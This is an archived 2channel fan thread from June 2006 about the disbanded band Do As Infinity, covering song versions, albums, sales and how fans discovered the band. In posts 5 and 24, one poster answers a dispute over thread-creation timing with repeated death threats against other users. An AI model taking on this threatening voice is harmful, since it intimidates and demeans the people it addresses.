2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

Do As Infinity Vol.52

1 :伝説の名無しさん:2006/06/13(火) 17:36:57
Do As Infinity Official Web site  http://www.d-a-i.com/

最新リリース情報は>>2以降。
バンド活動経緯等はwikiペディアで。(質問する前にもこちらを参照推奨)
http://ja.wikipedia.org/wiki/Do_As_Infinity

前スレ
Do As Infinity Vol.51
http://music4.2ch.net/test/read.cgi/legend/1145884765/
過去ログ
http://makimo.to/cgi-bin/search/search.cgi?q=DoAsInfinity&andor=OR&sf=2&H=&view=table&shw=&D=legend&D=musicjg&D=musicj

関連スレ

伴都美子 Vol.7
http://music5.2ch.net/test/read.cgi/musicjf/1148902612/
ミサイルイノベーション Vol.1
http://music5.2ch.net/test/read.cgi/musicjg/1126619380/
Amasia Landscape Vol.1
http://music5.2ch.net/test/read.cgi/musicjg/1126706717/

2 :伝説の名無しさん:2006/06/13(火) 17:41:21
>>1


3 :伝説の名無しさん:2006/06/13(火) 17:54:47
>>1
氏ね

4 :伝説の名無しさん:2006/06/13(火) 18:02:42
このスレッドは削除依頼が出されております

5 :伝説の名無しさん:2006/06/13(火) 18:26:43
>>3
お前が死ね。殺すぞ?

>>4
ふざけんなよ?お前殺してやる

6 :伝説の名無しさん:2006/06/13(火) 23:47:22
※テンプレ追加

・次スレは>>980が立てること。

7 :伝説の名無しさん:2006/06/13(火) 23:48:41
>>6
それは無効。
次スレも絶対、>>950で立てます。

8 :伝説の名無しさん:2006/06/13(火) 23:51:16
※テンプレ追加

・次スレは>>950で立てること。

9 :伝説の名無しさん:2006/06/14(水) 01:07:40
>>7-8は無視でお願いします

10 :伝説の名無しさん:2006/06/14(水) 01:29:26
もめるんなら、後でもいくらだって出来るので、今はとりあえずスレ立ての事は忘れて、Do As Infinityについて語ろうよ。

(`・ω・´)さてと

11 :伝説の名無しさん:2006/06/14(水) 01:29:52
伴ちゃん派と亮さん派と分かれるとこかと思うけど、長尾派ってあんまいないね。

12 :伝説の名無しさん:2006/06/14(水) 07:12:39
>>9
お前を無視

13 :伝説の名無しさん:2006/06/14(水) 08:18:06
>>1
最新リリース情報は次から外せよ

あっお前は次からスレ立てるな

14 :伝説の名無しさん:2006/06/14(水) 09:21:17
無駄な争い
今回はあまり無駄梅はなかったが無駄埋めよりうざかった
本当に今まではへんな埋めでも>>1乙と必ず言っていたが、今回は言えない…
ぶっ殺すとか
真面目に通報しますよ

15 :伝説の名無しさん:2006/06/14(水) 09:23:16
このスレ\(^O^)/オワタ

16 :伝説の名無しさん:2006/06/14(水) 11:27:44
次スレは>>980で立てたら良い
それより前に立てても無視して、>>980で立て直せ

17 :伝説の名無しさん:2006/06/14(水) 12:16:53
別に>>950でも>>980でスレ立てしようと構わないけど
死ねとか殺すぞなんていう奴にスレ立てしてほしくない

18 :伝説の名無しさん:2006/06/14(水) 12:22:12
>>1叩きはこれくらいにして、そろそろDoAsの話しようや

19 :伝説の名無しさん:2006/06/14(水) 14:19:46
亮のアコギのバッキングが好きなんですけど。

20 :伝説の名無しさん:2006/06/14(水) 16:00:09
前スレで、new worldはシングルとアルバムで違うということでしたが
We are、NEW WORLD、Do The Bestに収録されている
new worldは全て違うんですか?

21 :伝説の名無しさん:2006/06/14(水) 16:35:49
全て違う

01年のツアーや、ラストライブで披露されたのが
NEW WORLDバージョン

We are収録分はNEW WORLDのアレンジと違うし、コーラスは全て伴で、亮はなし
Do the BESTはNEW WORLDの冒頭SEなし

22 :伝説の名無しさん:2006/06/14(水) 16:59:56
浜崎の新曲DAIらしいね。初めて聴いたとき久々に浜崎でいい曲だと思ったら
長尾だったからちょと嬉しい。

23 :伝説の名無しさん:2006/06/14(水) 17:22:43
何だかんだいって結局浜崎と切ってないじゃないか。まあエイベの指示かもしれんが。
伴ちゃんにはもう提供しないのかな?

24 :伝説の名無しさん:2006/06/14(水) 17:34:33
>>13
上の件については了承。
下の件については聞く耳持たず。

>>14
通報してみろよボケ!
お前、マジで殺すぞ!!

>>16
へぇ〜、お前ら板のルールを無視して重複スレを立てるつもりなのか。
スレ立てのタイミングごときで、そんなこと認められるかっつーのボケ!
ぶち殺すぞ!!

>>17
てめぇもいい加減にしないと殺すぞ!

お前ら、どうせ980より前に次スレ立てないんだろ?
俺はこれからもその前に次スレを立てるからな!
ガタガタぬかす奴は皆まとめてぶち殺すぞ!

25 :伝説の名無しさん:2006/06/14(水) 17:37:55
散りゆく夕辺もシングルとアルバムで違うのですか?

26 :伝説の名無しさん:2006/06/14(水) 17:40:02
>>1
らりってる…

27 :伝説の名無しさん:2006/06/14(水) 17:43:10
>>25
違ったり、違わなかったり

28 :伝説の名無しさん:2006/06/14(水) 17:44:32
>>25
シングルはちょっと古すぎてわからないけどたぶん同じじゃないかな

29 :伝説の名無しさん:2006/06/14(水) 17:56:39
>>25
BODの初回に入ってんのだけが違う@アコースティックバージョン

30 :テンプレ張り忘れ:2006/06/14(水) 18:01:36
最も安く全曲を手に入れるには・・・
Do The Box(\10,000) →amazonで\6,000
Do The B-side(\2,500)
サポセレ(\3,500)
TAO(\1,050)
under the sun/under the moon(\1,050)
Tangerine Dream(\1,260)
計\19,360(税込)


31 :25:2006/06/14(水) 18:34:19
みなさんありがとうございます。

32 :伝説の名無しさん:2006/06/14(水) 18:36:16
742 名前:名無しの歌姫[sage] 投稿日:2006/06/14(水) 07:47:59 ID:fIswzoxh
ラストアイテムが出た前後に向こうのスレ行ってたけど、
まだ同じことやってるんだね・・・
あのとき一度スレ立てたけど、950ぐらいで立てたから文句言われたなぁ・・・
●持ってるから他の常駐スレでも良く新スレ立てるけど、
スレ立てのタイミングぐらいでギャーギャー言われるなんてあのスレぐらいだよ・・・
どうせ一人がうるさいのがいるだけだろうけど。ID出ないしあそこ。

33 :伝説の名無しさん:2006/06/14(水) 18:55:19
>>30
under the sun/under the moonは何でだっけ?

34 :伝説の名無しさん:2006/06/14(水) 18:56:51
>>33
under the moonはA-sideにしか入ってないから

35 :伝説の名無しさん:2006/06/14(水) 18:58:51
>>34
あぁなるほど、>>30はA-Side抜かしてあるんだね
thx

36 :伝説の名無しさん:2006/06/14(水) 19:03:30
そういやラストライブでTAOに入ってたaurora歌ってないんだっけな

37 :伝説の名無しさん:2006/06/14(水) 19:07:22
あの場でauroraは・・・・まだあいのうたの方がいいな

38 :伝説の名無しさん:2006/06/14(水) 19:07:59
まあリミックスバージョンとか欲しかったら、初期のシングルは買わんと駄目だな
インストバージョンもだったら全部w
いっそのことこれらもそれぞれアルバムに編集してまとめれば良かったのにな、Boxに

39 :伝説の名無しさん:2006/06/14(水) 19:11:50
でも一度くらいライブで歌って欲しかった気も
まあ他にも一回も歌われてないのあるけどさ

40 :伝説の名無しさん:2006/06/14(水) 19:42:35
D/N/A、WeedsはGOHツアーでやって欲しかったな。

41 :伝説の名無しさん:2006/06/14(水) 20:29:40
>>38
インストなら「MINUS V」なんてのがありまつがw 正直どのぐらい売れてるんだろう…
サポセレ投票のとき、みんなで結託して「本当のB-side」作れば良かったんだきっと。

42 :伝説の名無しさん:2006/06/14(水) 20:56:53
>>41
そういやあったなw
暇だったんで全部のインスト曲をそのCD分も含めて数えてみたら、51曲あった。
CD3枚分もインスト曲だけってのは虚しいw

43 :伝説の名無しさん:2006/06/14(水) 21:25:20
環境音楽としてはいいかもねw

ふとネタを思いついたが、
Y&Tのオケで徒然なるままにを歌うテストってやった香具師いるのかな?

44 :伝説の名無しさん:2006/06/14(水) 23:34:04
長尾、浜崎に曲書いたの?

45 :伝説の名無しさん:2006/06/15(木) 08:38:01
>>43
テンポが違い過ぎる
逆ならやったことあったが…

46 :伝説の名無しさん:2006/06/15(木) 22:55:08
>>45
ワラタ そう言われればそうだな。 まるでお経だなw

47 :伝説の名無しさん:2006/06/15(木) 23:26:14
MINUS V ってどういう意味ですか?

48 :伝説の名無しさん:2006/06/15(木) 23:31:32
マイナス 伴
インストアルバムだから

49 :伝説の名無しさん:2006/06/15(木) 23:34:08
ヴォーカルのVだろ?

50 :伝説の名無しさん:2006/06/15(木) 23:50:26
どっちもじゃん?

51 :伝説の名無しさん:2006/06/16(金) 00:19:13
MINUSってマイナスって読むのか

ミーナスかと思った無知な俺

52 :伝説の名無しさん:2006/06/16(金) 01:06:31
>40
同感。けっこー好き。


53 :伝説の名無しさん:2006/06/16(金) 01:36:57
何処まで/流され/あなたはゆくの?

54 :伝説の名無しさん:2006/06/16(金) 12:48:06
そろそろいいでしょ?

55 :伝説の名無しさん:2006/06/16(金) 16:47:53
http://www.yourfilehost.com/media.php?cat=video&file=sora0614.wmv

56 :伝説の名無しさん:2006/06/16(金) 16:54:57
11位(初登場) Do As Infinity 「TAO」
ゲーム『テイルズ オブ レジェンディア』オープニングテーマ。「Week!」(2001年5月/最高位8位)から前作まで11作連続初登場TOP10入りでしたがここでストップ。初動20699枚。

57 :伝説の名無しさん:2006/06/16(金) 19:16:29
遠くまでってトップ10入りしてなかったんだ意外

58 :伝説の名無しさん:2006/06/16(金) 20:26:22
浜崎の新曲の作曲がD・A・I

59 :伝説の名無しさん:2006/06/16(金) 20:30:39
・A・

60 :伝説の名無しさん:2006/06/16(金) 20:35:25
>>59
プチワロスw

61 :伝説の名無しさん:2006/06/16(金) 21:26:31
>>56
Flowerは1.4万だったから6000人離れたわけか
この先大丈夫かな?一年たったら初動1万割れの仲間入りするかもしれないorz

62 :伝説の名無しさん:2006/06/16(金) 21:52:34
>>61
曲次第かと。
DAIも曲で売り上げは変動してたし。

63 :伝説の名無しさん:2006/06/16(金) 22:17:52
CDのレビューが載ってるサイトいくつか教えて。
GOH、NYLあたりのアルバムレビューが見たい。
最近、特にはまって聴いてるからどういう捉え方をされてるのかすごく知りたい。

64 :伝説の名無しさん:2006/06/16(金) 22:23:59
>>57
俺遠くまでで、DAIを知って
当時日テレで放映していた、
速報!歌の大辞テンで、11位から20位までを紹介する
コーナーで20位でこの曲が流れていて
「これなんか良いな。」とか
「何でこんな良い曲が10位以内に入れないんだろうか?」
と思って、次の日レンタル屋で遠くまでのシングルを借りて
その後DFのアルバムを買ってそれ以降DAIにハマったけど、
俺と同じ入り方の方いませんか?

65 :伝説の名無しさん:2006/06/16(金) 22:25:20
ヤフーでも見れば?

66 :伝説の名無しさん:2006/06/16(金) 23:40:43
DTBから入った俺はTSにすぐ馴染めなかった。
印象的に「あれ?DAIってこんなバンドだっけ?」って思った。

67 :伝説の名無しさん:2006/06/17(土) 00:03:42
俺は深い森を犬夜叉で聴いてから少しして借りたDTBのNWを聴いて一気にハマった

68 :伝説の名無しさん:2006/06/17(土) 00:39:51
オレは本格的にハマったのはA-sideから・・・・おい、遅えよorz
それまで深い森、柊、Ftfとか知ってたけど初期の聴いたらすぐショボさに気づいた
もっと早くファンなっとくべきだった


69 :伝説の名無しさん:2006/06/17(土) 01:55:05
俺はCDTVで四十位にOasisが入っててはまった

70 :伝説の名無しさん:2006/06/17(土) 02:16:07
オレの場合
a-nation'03で聴いたサマデイと晴天が気に入る
→a-nation'04であいのうたが気に入りTSをレンタルしてハマる
→a-nation'05までにアルバムは全部借りてボチボチ聴く
→次の単独あったらいきたいなと思った矢先解散
→その後本格的にハマるorz

71 :伝説の名無しさん:2006/06/17(土) 06:36:49
↑一番可哀想なパターンw

72 :伝説の名無しさん:2006/06/17(土) 09:07:44
俺は、大学受験で3月に友達と数学の問題を出しあってて、極大値の問題で
『limでχを無限大に飛ばす、無限大、infinityに飛ばすんじゃー!』
の会話から、
俺『そういや、どぅあずいんふぃにてぃってヤツ居なかったか?』
友『もう解散したよ(笑)』
俺『どんな曲があるの?』
一同『知らねー(笑)とりあえず微妙なグループだろ』
俺『じゃあなんとなくベスト盤中古で買ってみるか。
  解散から日も経ってるし、安くなってるだろ』

で、A-sideを中古で買ってPV集見てハマった。3曲目のOasisで。

73 :伝説の名無しさん:2006/06/17(土) 09:34:31
いいだろォ、oasis!
いいだろォ、俺のギター!!

74 :伝説の名無しさん:2006/06/17(土) 09:42:58
>>72
その友達に良さを小1時間語ってやってくれw

75 :伝説の名無しさん:2006/06/17(土) 09:45:44
チラ裏の嵐だがそれでもいいと思っている

76 :伝説の名無しさん:2006/06/17(土) 09:54:24
いや、だめだ。

77 :伝説の名無しさん:2006/06/17(土) 10:49:11
伴flowerってソロなのにDAIみたいで意味あんのか?って感じなんだが

78 :伝説の名無しさん:2006/06/17(土) 12:32:09
>>77
一人でやってることに意味あり

79 :伝説の名無しさん:2006/06/17(土) 12:56:12
元々自分で作曲とかしてたわけじゃないし、似てたからってどうってことはない。
HYDEとかと違うんだから。

80 :伝説の名無しさん:2006/06/17(土) 14:22:14
>>72-73
Oasisのクリップといえば、
PV史上最強にクールビューティーな伴ちゃん。
それしかない。

Desire? あれはちょっとベクトルが違う…
なんとなく、なり切れてない印象も受ける。

81 :伝説の名無しさん:2006/06/17(土) 14:23:42
flower確かにDAIっぽいが、やっぱ長尾の作る曲とは違う
俺はソロバンには興味なし

82 :伝説の名無しさん:2006/06/17(土) 14:34:47
友達がほしいよ(´・ω・`)

ぼくがいるお( ^ω^)ノ(´・ω・`)

勉強がむずかしいよ(´・ω・`)

無理せずがんばれお( ^ω^)ノ(´・ω・`)

彼女がほしいよ(´・ω・`)

君ならつきあえるお( ^ω^)ノ(´・ω・`)

もう死にたい・・・(´・ω・`)

僕を一人にするのかお( ^ω^)ノ(´・ω・`)

                                それがDAIヌクモリティ

83 :伝説の名無しさん:2006/06/17(土) 15:06:25
久し振りにDAIのブログを見つけた
http://plaza.rakuten.co.jp/danon/diary/200606170000/

84 :伝説の名無しさん:2006/06/17(土) 15:09:33
トラックバック:http://tb.plaza.rakuten.co.jp/danon/diary/200606170000/b217b/

85 :伝説の名無しさん:2006/06/17(土) 15:12:51
個人サイト載せていいのか・・・?

86 :伝説の名無しさん:2006/06/17(土) 15:39:38
>>85
どうせ>>83自身のブログでしょ。
今日更新さればかりなのに、第三者がすぐに見つけるというのもおかしい。
こうやって自分のブログだったりサイトを宣伝する行為は珍しくない。

87 :伝説の名無しさん:2006/06/17(土) 17:00:47
>>83
段落構成考えずにダラダラ書いてるから読みにくそう。

88 :伝説の名無しさん:2006/06/17(土) 18:18:12
やっぱ、読み易い日記と言えば、
箇条書きに限るな。
ではまた。

89 :伝説の名無しさん:2006/06/17(土) 19:08:13
まぁ素人が書くものなんてこんなもんだろう。
DAIネタだから読んだが、普通は読まない。


90 :伝説の名無しさん:2006/06/17(土) 19:11:44
>>83
長すぎて読む気失せた
伴ちゃんはシンプルイズベストを教えたかったんだなww

91 :伝説の名無しさん:2006/06/17(土) 19:16:14
最後のGOHに感動したところだけで十分

92 :伝説の名無しさん:2006/06/17(土) 19:24:15
http://blog.livedoor.jp/snoopy0218/archives/50226572.html

93 :伝説の名無しさん:2006/06/17(土) 21:14:41
Do The BoxのDEEP FORESTとかTRUE SONGとか初回伴のスリーブ付きが入ってるの?
スリーブは付いてないの?
持ってない人すごく多そうだけど知ってる人いたら教えて。

94 :伝説の名無しさん:2006/06/17(土) 21:53:47
ない

95 :伝説の名無しさん:2006/06/17(土) 22:11:07
スリーブなんて付いてたんだ。
すると、CD本体とブックレットが初回版と同じ仕様
ってことになるんかな。

96 :伝説の名無しさん:2006/06/17(土) 22:23:17
店頭で見た限り、個々のスリーブケースはついてなかった。

あくまで「音源の完全収録」であって
ブックレット(DF)やポストカード(TS)などの初回特典は、ついてないと思う

97 :伝説の名無しさん:2006/06/17(土) 22:24:00
初回 伴 

98 :伝説の名無しさん:2006/06/17(土) 22:28:29
>>93
初回伴を中古で買い集めた方がいいと思う

99 :伝説の名無しさん:2006/06/18(日) 01:07:26
DAIはグラサン取るとキモメンな件

100 :伝説の名無しさん:2006/06/18(日) 02:20:23
DAIはグラサンとらなくてもレッド吉田

101 :伝説の名無しさん:2006/06/18(日) 23:35:20
過疎りすぎだろ
あげ

102 :伝説の名無しさん:2006/06/19(月) 16:19:29
このスレ完全に終わったな

103 :伝説の名無しさん:2006/06/19(月) 16:54:41
ラストのグッズも出てしまったしな
後は遅咲きの入門者がポツポツ来る程度だろう

104 :伝説の名無しさん:2006/06/19(月) 17:29:23
それでもなんとなくこのスレをみてしまう

105 :伝説の名無しさん:2006/06/19(月) 17:42:29
3ヶ月後に解散一周年記念とかいってかつての厨が大量に流れてくるに一万ペソ

106 :伝説の名無しさん:2006/06/19(月) 18:14:14
伝説板ってどこも過疎ってそうだけどそうでもないの?

107 :伝説の名無しさん:2006/06/19(月) 20:48:07
なんかHEY3に伴と巫が出てるような…

108 :伝説の名無しさん:2006/06/19(月) 21:15:37
出てたね。

109 :伝説の名無しさん:2006/06/19(月) 22:05:28
おいらは、化粧品のCMでWe.are、Desireに片足突っ込み、2ndアルバムNEW WORLDでハマり、去年の春初ライブ見に行ったのが最後
これから、DAI以上にハマるバンドが出てこないと思う。

110 :伝説の名無しさん:2006/06/19(月) 22:27:04
ヤフーミュージックの
オリコンのランキングに伴の名前があったから
クリックしたら、「一致するデータがありませんでした。」
と表示された。

伴都美子で検索しても同じ結果になった。

一応DoAsInfinityの元ヴォーカリストなのに
この扱いは酷すぎると思った。

111 :伝説の名無しさん:2006/06/19(月) 23:30:12
英語の略称の意味を検索できるサイト
http://www.acronymfinder.com/

思わずdaiって入れて、本当に出てくるから驚いた。
trfなんて出てこないのに。

112 :伝説の名無しさん:2006/06/19(月) 23:46:36
>>110
それマジかよ。今日の兵兵兵といい何かDAI(ていうか伴ちゃん)って毎回扱い酷いよね。
過去に何か問題起こすようなことでもしたの?

113 :伝説の名無しさん:2006/06/20(火) 00:01:23
音楽業界に関わることといったら初のCCCD採用くらいかな・・・
全盛期もこんな感じだったのか、当時の頃はよく覚えてないが

114 :伝説の名無しさん:2006/06/20(火) 01:19:18
>>111
しかも一番最初か
まあ、アニメでちょっと知られてるせいもある?
てかtrfは略語と認識されてないんじゃない?
その三文字でユニット名だし(実際は意味あるはずだけど)。

115 :伝説の名無しさん:2006/06/20(火) 02:34:32
NEED YOUR LOVE借りてみたらドゥアズにハマッた!
菜の花畑とかやばいね〜もっと早く知っときゃ良かった…

116 :伝説の名無しさん:2006/06/20(火) 02:45:27
>>115
遅すぎた 願い事を 一人つぶやいてぇ〜

117 :伝説の名無しさん:2006/06/20(火) 02:55:32
>>114
オンタマ見なかったんだな。

118 :伝説の名無しさん:2006/06/20(火) 16:27:09
>>115
是非他のアルバムも聴いてやってください

119 :伝説の名無しさん:2006/06/20(火) 18:34:29
   ■     ■            ■                       ■
   ■     ■           ■     ■■■■■■         ■
■■■■■■■■■ ■      ■                       ■
   ■      ■       ■■    ■ ■■■■■■■■    ■■
   ■      ■      ■  ■           ■         ■   ■     ■■
   ■      ■    ■    ■          ■       ■    ■     ■■
          ■           ■          ■            ■     ■■
         ■           ■          ■            ■     ■■
        ■            ■          ■             ■     ■
    ■■■             ■    ■■■■              ■
                     ■                       ■      ●

>>119

120 :伝説の名無しさん:2006/06/20(火) 20:19:02
heyheyhey見忘れた・・・

121 :伝説の名無しさん:2006/06/20(火) 21:45:04
どまい
ボウリングもおもしかったよ

122 :伝説の名無しさん:2006/06/20(火) 21:51:14
リーダーはちゃんと空気読んでたしね。ああいうとこは見習おう

123 :伝説の名無しさん:2006/06/20(火) 21:59:46
GOHってアルバム曲とシングル曲の雰囲気違くね?

閉店、魔(ryとか世界観を破壊してね?

124 :伝説の名無しさん:2006/06/20(火) 22:41:14
>>123
確かに言われてみると、シングル曲が浮いているけど、
TSのあいのうたと、ONE OR EIGHT以外のアルバム曲の駄曲の多さに
4年前、聴くの辞めた俺が、解散して今年になって、
このスレのVOL51あたりを読んで、また聴きたくなって、
GOH聴いて、またマイブームになった俺からすれば、
あのアルバム自体は良作だと思うし、その次のNYLも同じくシングルが浮いているけど
そこそこの佳作だし

TSだけが、何故か今でも良さがわからない、あのアルバムのおかげで、リアルタイムで
武道館とか行けなかった、orz

125 :伝説の名無しさん:2006/06/20(火) 22:54:11
やっぱりTSはダメだよな。
空想旅団、一か八か、あいのうた以外は聞くに堪えない。

GOHもGoh→閉店で萎えたが。

126 :伝説の名無しさん:2006/06/20(火) 22:55:10
魔法はシングルのDVDに限るな。
セリフの字幕が入ってたり(少し脚本も入ってる)
伴ちゃんの栓抜き、クロス抜きとか


127 :伝説の名無しさん:2006/06/21(水) 00:04:56
>>125
郷→閉店は萎えるよなw

しかし、アルバム曲のみを抜き出してGOHを聴くと自分的にはどのアルバムより神。

128 :伝説の名無しさん:2006/06/21(水) 00:12:53
Do Asの傑作アルバムといわれたらやっぱりBODかNWになるのか?

129 :伝説の名無しさん:2006/06/21(水) 00:23:03
>>119
どうやってんだろこれは?
レス番で見ればサイコウだぞ

130 :伝説の名無しさん:2006/06/21(水) 01:13:57
ヒント:半角スペース

131 :伝説の名無しさん:2006/06/21(水) 02:23:18
Goh→魔法ってした方が良かったんじゃないか?

132 :伝説の名無しさん:2006/06/21(水) 06:45:48
>>131
君とは友達になれそうにない。

133 :伝説の名無しさん:2006/06/21(水) 07:19:31
>>124-125
One or Eightも十分糞曲だろ

てかOne or Eightはアルバム曲じゃない。
真実の詩のカップリング。

TSはI can't be myselfとか大好きだけどな。

134 :125:2006/06/21(水) 07:43:25
>>133
まず俺は「アルバム曲で」なんて言ってない。

135 :伝説の名無しさん:2006/06/21(水) 08:21:27
俺もアイキャンはいいと思う。
正直グレジャニと一か八かの区別がつかない……。轍はインパクト足らずですぐ飽きるな。
空想、真実、あいのうたは普通にいい。

136 :伝説の名無しさん:2006/06/21(水) 17:52:39
TSの曲って他のに比べて聞く頻度かなり低いな
I can't be myselfって引きこもりのこと歌ってるんじゃないかと
思うんだけど、誰か引きこもり経験者だったのかな?
あとシークレットの遠くまでを12曲目にしてくれれば(ry

137 :伝説の名無しさん:2006/06/21(水) 18:24:43
当時、友達にTS貸したら、遠くまでが一番いいねと言われた。


138 :伝説の名無しさん:2006/06/21(水) 18:30:31
GOHのブランコ〜科学の夜までの流れは神だと思う

139 :伝説の名無しさん:2006/06/21(水) 18:59:49
>>138
その神の流れにシングル曲が入ってないことが神。

140 :伝説の名無しさん:2006/06/21(水) 19:16:06
そういや俺、未だにNEETじゃなくてNEED YOUR LOVE聞いてないや

141 :伝説の名無しさん:2006/06/21(水) 19:39:57
ライブ用にガンガン盛り上がろう系のスタンスとってたTSはダメだな。
やっぱりDo Asにこの系統は合わんわ。少し暗めの曲が合う。

142 :伝説の名無しさん:2006/06/21(水) 19:51:04
TSは全体的にカス

143 :133:2006/06/21(水) 20:01:47
>>134
いや、別に2段目以降は124だけに言ったと取って貰えれば・・・
勘違いしてるか微妙だったから改行付けたわけで・・・まあどうでもいいけど。

144 :伝説の名無しさん:2006/06/21(水) 20:19:08
健康診断で身長測ったら
少し伸びて164センチになってた

伴ちゃんに少し近づいたよー

145 :伝説の名無しさん:2006/06/21(水) 20:59:17
GOHが一般人をDAIにはめさせるには一番よくない?
全体的に聞き手を選ばない曲ばかりだと思う。

146 :伝説の名無しさん:2006/06/21(水) 21:03:15
いや、NWかDFがいいと思う

147 :伝説の名無しさん:2006/06/21(水) 21:20:07
>>146
ちょっと軽いノリの曲ばっかじゃない?

148 :伝説の名無しさん:2006/06/21(水) 21:53:55
ちょっと軽いノリの曲多い方が一般受けするとおもう

149 :伝説の名無しさん:2006/06/21(水) 22:04:29
一般人には、DFか、Do the Bestの方がいいと思う。
特にDFは当時若いOL層にも人気があったらしいし。

150 :伝説の名無しさん:2006/06/21(水) 22:21:51
GOHはスルメじゃね?

151 :伝説の名無しさん:2006/06/21(水) 22:37:07
For the futureって大塚が歌っても全く違和感ないな

152 :伝説の名無しさん:2006/06/21(水) 22:44:29
>>136
I can't be my selfは亮が伴ちゃんのマイナス面みたいなのをを客観的に見て書いた詞だった希ガス

153 :伝説の名無しさん:2006/06/21(水) 23:53:08
TSよりGOHを先にだしていればよかった・・・ボソ

154 :伝説の名無しさん:2006/06/22(木) 00:30:08
TS→GOH→TAO発売→解散→B-side発売
だったら神だったな。

155 :伝説の名無しさん:2006/06/22(木) 01:57:10
>>152
あんまり亮の詞っぽくないね。

156 :伝説の名無しさん:2006/06/22(木) 03:39:10
>>152
え・・・それ伴ちゃん知ってるのか?
もし知ってるのだとしたら伴ちゃんが解散を考えたキッカケはその曲なんじゃ・・・?

157 :136:2006/06/22(木) 04:21:20
>>152
そうなんだ、サンクス
てっきり伴ちゃんが書いた詞だと思ってた


158 :伝説の名無しさん:2006/06/22(木) 08:11:05
>>156
ちょwwwそんなに詞がイヤだと感じたら、まず歌うの拒否するだろ。

159 :伝説の名無しさん:2006/06/22(木) 08:19:09
仕事断れる程大物じゃない

160 :伝説の名無しさん:2006/06/22(木) 08:39:14
>>159
いくらなんでも、スタジオミュージシャンじゃないし、曲は選ぶことができるだろ
歌入れまで終わったのに、リリースするまで1年とか2年とか塩漬けした曲もあるぐらいだ。

161 :伝説の名無しさん:2006/06/22(木) 09:07:16
となると「この世界に潰されそうで〜」の、この世界はDAIのことなのか?

162 :伝説の名無しさん:2006/06/22(木) 14:15:05
>>156
さすがに現在進行形の心境を
書いたわけじゃないだろ。

例の頃のVANのことを題材にして
「今はこんなに成長したようなぁ」って
言ったんだろ。


表向きはw


163 :伝説の名無しさん:2006/06/22(木) 18:03:29
Do The Bestとか貸したらあんまり受けが良くなかった。
今のはやりは生音らしいので打ち込みの多い曲は嫌われるらしい。
NYL、GOH、BODあたりが聞きやすいのかな?

164 :伝説の名無しさん:2006/06/22(木) 18:53:04
DAIをよく知らない人には、DF,GOHから入るといいんじゃないかな。
それで大まかに知ってもらって、BODやNWで初期はこんな感じだったんだよみたいな。
もしもっと深く知りたいってことであれば、他のアルバムも聞くといいと思う。

165 :伝説の名無しさん:2006/06/22(木) 19:09:33
確かに昔の曲の打ち込みはうざいし変だ。
135とか今聴くとやばいな。

166 :伝説の名無しさん:2006/06/22(木) 19:31:38
打ち込みって何??

167 :伝説の名無しさん:2006/06/22(木) 20:41:42
>>166
小室先生が得意とするピコピコサウンド

168 :伝説の名無しさん:2006/06/22(木) 22:52:34
135は生音(ギター)+打ち込み+SEって感じだ
ギターが右チャンネルから左チャンネルに移動するのが非常に耳障り

169 :伝説の名無しさん:2006/06/23(金) 00:52:23
Mナンバーって何処で調べられますか?

170 :伝説の名無しさん:2006/06/23(金) 11:07:55
>>167
打ち込みだったら、必ずピコピコサウンドなのか。
ピコピコサウンドだったら、必ず打ち込みなのか。
あと、音を聞いただけで打ち込みかそうでないかを
必ず聞き分けられるものなのか。

実際は全部そうではないと思うな。
それと、ああ見えて小室先生は大学でクラシック専攻。


171 :伝説の名無しさん:2006/06/23(金) 12:09:46
>>170
素人には生音にしか聞こえない
打ち込みサウンドがあるのは
事実なので同意。

DAIの場合、明らかに効果を狙って
打ち込みと生を使い分けている。
135の場合、打ち込みの方が
曲にマッチすると亀ちゃんが
判断したんでしょ。

ちなみに小室哲哉は音大には行ってない。
Wikipediaによれば、
「早稲田大学教育学部教育心理学科除籍」
だそうだ。
バイオリンを習っていたので、クラシックの
影響がないとは言えないけどね。


172 :伝説の名無しさん:2006/06/23(金) 12:30:54
既出の質問で悪いが、ピコピコサウンドって何?135で言うとどの辺の音なの?

173 :伝説の名無しさん:2006/06/23(金) 15:10:33
ぐぐれ
常識だ

174 :伝説の名無しさん:2006/06/23(金) 15:27:35
>>171
亀ちゃんの判断ミス

175 :伝説の名無しさん:2006/06/23(金) 15:32:02
「135で言うとどの辺の音なの?」はググっても出ないかと

176 :伝説の名無しさん:2006/06/23(金) 15:47:47
>>172
「ピコピコサウンド」 = いかにもシンセっぽい音

似たモノに、「髭のピロピロサウンド」ってのがあるが
あれとは違う。

177 :伝説の名無しさん:2006/06/23(金) 18:16:27
NW自体がBODから一転してピコピコサウンド多過ぎで、発売当時もビビったが
135に関しては「やりすぎ」って感じがする

長尾が抜けて制作体制が変わった混乱の中で
制作意図とアレンジが噛み合わなかった結果のだったのかな

178 :伝説の名無しさん:2006/06/23(金) 19:03:46
>>177
レッドは明らかに小室の影響受けてるよな?
そこから考えると、一概に反打ち込み派とは
思えないけど。

ま、あの当時は今ほど生楽器にこだわる理由も
なかったと思うし、亀ちゃんがメンバーに相談なしに
勝手に決めちゃったってこともないでしょ。

ただあの頃の髭のインタビューを読んだ限りでは
アレンジは亀ちゃんにまかせっきり(ギターも含む)
だったようだけどね。

相談しながらアレンジするんじゃなくて、先に
デモが出てきて「これでどう?」って感じで。
で、髭や他のミュージシャンが再現するっって
感じだったみたいね。


179 :伝説の名無しさん:2006/06/23(金) 19:43:25
陽のあたる坂道からアレンジ変わったな。打ち込み全然なくなった。


180 :伝説の名無しさん:2006/06/23(金) 19:58:17
>>176
良く分かった。サンクス!

181 :伝説の名無しさん:2006/06/24(土) 02:06:14
一般的な話、曲のクレジットに
「Programing 誰それ」
って書いてあったら、何らかの打ち込み音が入ってる曲なのだが

DoAsの場合、シングル曲はクレジット表記がいい加減…(ぼそ)

182 :伝説の名無しさん:2006/06/24(土) 02:17:20
全部D・A・Iだからな

183 :伝説の名無しさん:2006/06/24(土) 02:31:22
俺はじめ見たとき作詞作曲全部長尾がしてるのかと思った

184 :伝説の名無しさん:2006/06/24(土) 08:09:14
ごめん俺も

185 :伝説の名無しさん:2006/06/24(土) 09:45:17
>>183
作曲は全部長尾だろ。
そもそも Do As Infinity という名前も
長尾大(D.A.I)の曲をリリースするためのバンド
という由来らしいしな。

186 :伝説の名無しさん:2006/06/24(土) 10:48:16
D・A・I
↑どうしても顔にしか見えない…

187 :伝説の名無しさん:2006/06/24(土) 11:50:57
>>185
古参のフリして

>作曲は全部長尾だろ

だってwwwww

188 :伝説の名無しさん:2006/06/24(土) 11:55:22
